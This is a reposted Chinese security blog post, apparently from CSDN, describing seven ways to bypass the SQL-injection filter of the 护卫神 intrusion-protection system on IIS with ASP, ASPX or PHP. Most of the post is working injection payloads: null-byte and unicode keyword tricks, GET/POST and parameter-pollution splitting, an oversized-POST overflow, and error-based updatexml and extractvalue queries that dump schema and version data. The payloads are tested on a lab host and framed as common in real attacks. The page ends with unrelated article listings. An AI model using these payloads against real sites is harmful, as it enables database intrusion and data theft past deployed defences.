护卫神mysql_hws_Bypass 护卫神SQL注入防御(多姿势)

最新推荐文章于 2021-08-12 20:10:14 发布
最新推荐文章于 2021-08-12 20:10:14 发布
阅读量227 收藏
点赞数
文章标签: 护卫神mysql_hws
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42136826/article/details/113982300
版权

0x00 前言

​   护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。

这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。

0x01 环境搭建

软件版本:护卫神·入侵防护系统 V3.8.1 最新版本

测试环境:IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL

079dc43d1dd0a0d453438e0c1cc5fa4b.png

9138160.html

0x02 WAF测试

​ 护卫神SQL防注入的规则几年了基本都没有什么变化,先来一张拦截测试图:

759c47d239c46a7d24a7da050aa379b5.png

9138160.html

姿势一:%00截断

%00截断是上传漏洞中常用的一个非常经典的姿势,在SQL注入中,也可以用来Bypass。

在WAF层,接收参数id后,遇到%00截断,只获取到 id=1,无法获取到后面的有害参数输入;

在ASPX+MSSQL中,支持%00来代替空白字符,构造的SQL语句得以成功执行,获取数据。

http://192.168.204.132/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns

323e6bbd12ae5df34ed23f95a54a4ab8.png

9138160.html在PHP+Mysql中,可以用/*%00*/,同样可以进行Bypass。

/sql.php?id=1/*%00*/union select 1,schema_name,3 from information_schema.schemata

姿势二:GET+POST

当同时提交GET、POST请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可轻易Bypass。

在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns

POST:aaa

8b5c4e6e46155c40b65de3b991f6d4ed.png

9138160.html

姿势三:unicode编码

IIS服务器支持对于unicode的解析,对关键词进行unicode编码绕过。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,column_name from information_schema.columns

136b22002c16cf7ff26ef5c3ef2b6c97.png

9138160.html

姿势四:ASPX+HPP

在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接 。

UNION、SELECT、两个关键字拆分放在GET/POST的位置,通过ASPX的这个特性连起来,姿势利用有点局限,分享一下Bypass思路。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union/*POST:id=*/select 1,column_name,3 from information_schema.columns

37b931e328667ab452665a92b2eb451a.png

9138160.html

姿势五:ASP %特性

在IIS+ASP中,当我们输入un%ion,解析的时候会去掉%号,服务端接收的参数是union。

http://192.168.204.132/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.columns

a43a8c644055a698f88492cc199b7183.png

9138160.html

姿势六:缓冲区溢出

在PHP+Mysql中,使用POST 大包溢出的思路可成功Bypass。

http://192.168.204.132/sql.php

POST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA

编写一个简单的Python脚本,当A的个数填充到49099时,可成功Bypass。

90b1184156115b25e9c77fdb6d4679db.png

e258a33fde46b0ffb16c84424e6ea7a1.png

9138160.html

9138160.html

姿势七:黑名单绕过

护士神SQL防注入,采用的是黑名单过滤,关键字并不全,比如只过滤union select,select from却放过了,那么这里就存在很多种绕过的形式。

9138160.html基本上报错注入、盲注、延迟注入都可以很轻易Bypass,这时候直接利用SQLMAP,指定注入方式来获取数据。

2ac8309c88a7dc817276c79dcf0ce47d.png

?id=1 or (select 1 from (select count(),concat((concat(0x5e5e21,@@version,0x215e5e)),floor(rand(0)2))x from information_schema.tables group by x)a)

?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

?id=1 and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1)))

0x03 END

​ 总结了几种IIS下SQL注入 Bypass的思路,在实战中也很常见。

本文由Bypass原创发布,原文链接:https://www.cnblogs.com/xiaozi/p/9138160.html  欢迎分享本文,转载请保留出处。

​ 关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

9138160.html

任念辰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第五篇:Bypass 护卫SQL注入防御(多姿势)1
08-03
0x01 环境搭建护卫官网:http://www.huweishen.com软件版本:护卫·入侵防护系统 V3.8.1 最新版本下载地址:http://do
护卫怎么安装mysql,护卫·主机大师增加一键安装SQLServer功能_护卫
weixin_29580123的博客
03-27 488
好消息,护卫·主机大师 增加一键安装SQLServer数据库的功能!自从主机大师推出市场以来,都将安全作为重中之重,深受广大用户的好评。我们也在不断地对其进行升级完善,让其更加好用、实用和安全。本次升级版本号未做变更,只是增加了SQLServer数据库的管理中的一键安装功能,如果您的服务器没有安装SQLServer但需要安装,则不必所有都升级,仅需要单独升级即可。详情请继续往下看。一、单独安装S...
护卫 mysql 升级_护卫php套件 php版本升级方法(php5.5.24)
weixin_36260335的博客
02-12 148
这篇文章主要介绍了护卫php套件 php版本升级方法(php5.5.24),需要的朋友可以参考下最近小编开始学习研究win2008 r2的php环境配置,发现护卫的php套件非常好用,安装简单,但是因为php版本不是最新的版本,所以就想将php升级下,因为新版的php修复了一些bug所以这里就分享下方法,,需要的朋友可以参考下。php套件适用于 64位的系统(win2008 r2 /win20...
Bypass 护卫SQL注入防御(多姿势
06-05 1543
0x00 前言​   护卫一直专注服务器安全领域, 其中有一款产品,护卫·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。这边主要分享一下几种思路,Bypass 护卫SQL注入防御。0x01 环境搭建护卫官网:http://www.huweishen.com软件版本:护卫·入侵防护系统 V3.8.1 最新版本下载地址:http://down.huw...
网络安全 数据库 MySQL 安全规范
KHOST的博客
02-18 1183
在生产中,安全是相当重要,毕竟你的核心数据都在里面,MySQL因为其开源的流行性,大量个人,企业,政府单位采用,但是,很多部署的时候采用都是默认的配置,这就导致了安全的相对欠缺,你需要针对你的安全有所加强。 总的来说,数据库一般划分为生产库,压测库,准生产库,测试库,开发库。下面部分主要说的是生产库,但其他库也适用。 1 mysql_secure_installation 这是数据库基础的安...
ait_sad_hws_labs
03-09
ait_sad_hws_labs
Kodluyoruz_Yemeksepeti_Bootcamp_Hws
03-18
Kodluyoruz_Yemeksepeti_Bootcamp_Hws
ProCode_HWs
02-23
ProCode_HWs
BC352_HWS-BTA2W.rar
08-11
csr bc3 蓝牙音频发射固件
护卫·好备份系统 v3.3.zip
07-17
护卫·好备份系统是四川万象更新网络通信有限公司开发的一款服务器数据备份软件,可以备份sql server2000/2005/2008、文件数据、MySQL数据库等,免费授权大家使用。 护卫·好备份系统功能 1.定时计划任务 ...
护卫 mysql 版本_护卫PHP套件 V2.1 自动配置版
weixin_33314040的博客
01-26 227
windows系统上安装配置PHP运行环境可真麻烦。先要安装IIS,再下载安装配置PHP,一切都是手动的,新手还真难搞。好麻烦!现在有了“护卫PHP套件”这套自动化程序后可就方便了很多了,护卫PHP套件是一款自动安装配置php+mysql+phpmyadmin等web环境的软件,新手安装配置php+mysql也轻而易举了。护卫:PHP套件是PHP+MySQL+Zend+PhpMyadmin的...
sql注入绕过与sqlmap绕过使用总结
jklbnm12的博客
08-12 852
前言 最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位师傅在实战中遇到waf可以看一看,能给各位师傅一点帮助,所以就想着写一篇。 还有一个很有可能是有注入点的但是,用了很多注入语句都不行,不知道怎么回事 后面再去慢慢研究。 正文 手动绕过 一:空格被过滤 当空被过滤掉的时候(也就是被删掉的意思)问你就可以使用编码或者注释进行绕过 %20,%09,/**/ &n
主机护卫MySQL创建教程_云主机搭建php+mysql运行环境教程(护卫 PHP套件)
weixin_27943395的博客
02-03 207
目前windows系统使用iis来搭建php+mysql环境的居多,由于手动配置会出现很多意想不到的错误以及安全上的问题,这里推荐的是护卫·PHP套件,可以非常方便的搭建好php+mysql+phpmyadmin一般系统安装完成以后,都自带了iis,这里就不介绍了,在远程云主机上面下载护卫·PHP套件ISAPI版:下载FastCGI版:电信下载上面是护卫php套件下载,一般windo...
主机护卫PHP500,主机大师升级通知,增加PHP7.2/PHP7.3_护卫
weixin_31582915的博客
03-23 246
为了提升安全和性能,护卫对旗下软件主机大师的PHP和MySQL进行了更新,详情如下:【主机大师】:升级点,新版本号V3.2.0:1、将PHP版本替换成最新,增加PHP7.2和PHP7.3版本;2、为了支持Zend,将PHP5.5和5.6从64位换成了32位;2、将MySQL从5.5和5.6变更成5.5和5.7版本,5.5是32位,5.7为64位;3、增加MySQL可以卸载的选项(停止和删除服务)...
护卫 更换mysql引擎_护卫·主机大师更换服务器方法(移机或重装)_护卫...
weixin_29015051的博客
01-25 507
本文主要介绍如何转移护卫·主机大师的相关数据及网站数据/SQL数据库,适用于重装系统及迁移服务器。一,备份数据:复制备份护卫·主机大师数据库文件;位置:护卫·主机大师安装目录/host/database/my.asp。复制备份您的的网站文件;位置:你所存放的网站文件目录(护卫·主机大师默认一般是在你指定wwwroot下)。复制备份您的MYSQL数据目录;位置:护卫·主机大师安装目录/ph...
护卫 更换mysql引擎_更换Mysql存储引擎为Innodb
weixin_29572661的博客
01-19 170
更换Mysql存储引擎为Innodb问题:由于环境中的Mysql数据库使用的是Mysql5.1.77版本 ,使用的是MYISAM引擎 ,会导致表级锁,并且不支持故障自动恢复(CSR)表级锁:对表中任意一行数据修改操作时,整个表都会被锁定,对其他行的数据都不能操作不支持故障自动恢复(CSR) :当断电时可能会出现数据损坏或丢失的问题解决方案: 将数据库升级到5.6.44版本并更换引擎为Innodb5...
mysql查询语句优化命令mysql explain
wengyupeng 蜗牛一步一步向前。。。
08-28 2216
explain显示了mysql如何使用索引来处理select语句以及连接表。可以帮助选择更好的索引和写出更优化的查询语句。 使用方法,在select语句前加上explain就可以了: 如:explain select surname,first_name form a,bwherea.id=b.id 分析结果形式如下: table | type | possible_keys |...
SQL黑客注入防御与绕过的多种姿势
sinat_38899493的博客
12-22 2390
一、 PHP几种防御姿势 1. 关闭错误提示 说明: PHP配置文件php.ini中的display_errors=Off,这样就关闭了错误提示。 2. 魔术引号 说明: 当php.ini里的magic_quotes_gpc=On时。提交的变量中所有的单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)会自动转为含有反斜线的转义字符。 魔术引号(Magic Quote)
编写-hws函数来判断参数是否为回文数
最新发布
05-22
以下是一个简单的 Python 函数,用于判断一个数是否为回文数: ```python def is_palindrome(num): """ 判断一个数是否为回文数 """ str_num = str(num) return str_num == str_num[::-1] def hws(num): """ 判断一个数是否为回文数,如果是回文数返回 True,否则返回 False """ if is_palindrome(num): return True else: return False ``` 首先,我们定义了一个辅助函数 `is_palindrome`,它将数字转换为字符串并比较其反转字符串是否与原始字符串相等。如果是,则该数字为回文数,否则不是。 然后,我们定义了 `hws` 函数。它将传递的数字作为参数,并调用 `is_palindrome` 函数来检查该数字是否为回文数。如果是,则 `hws` 函数返回 `True`,否则返回 `False`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值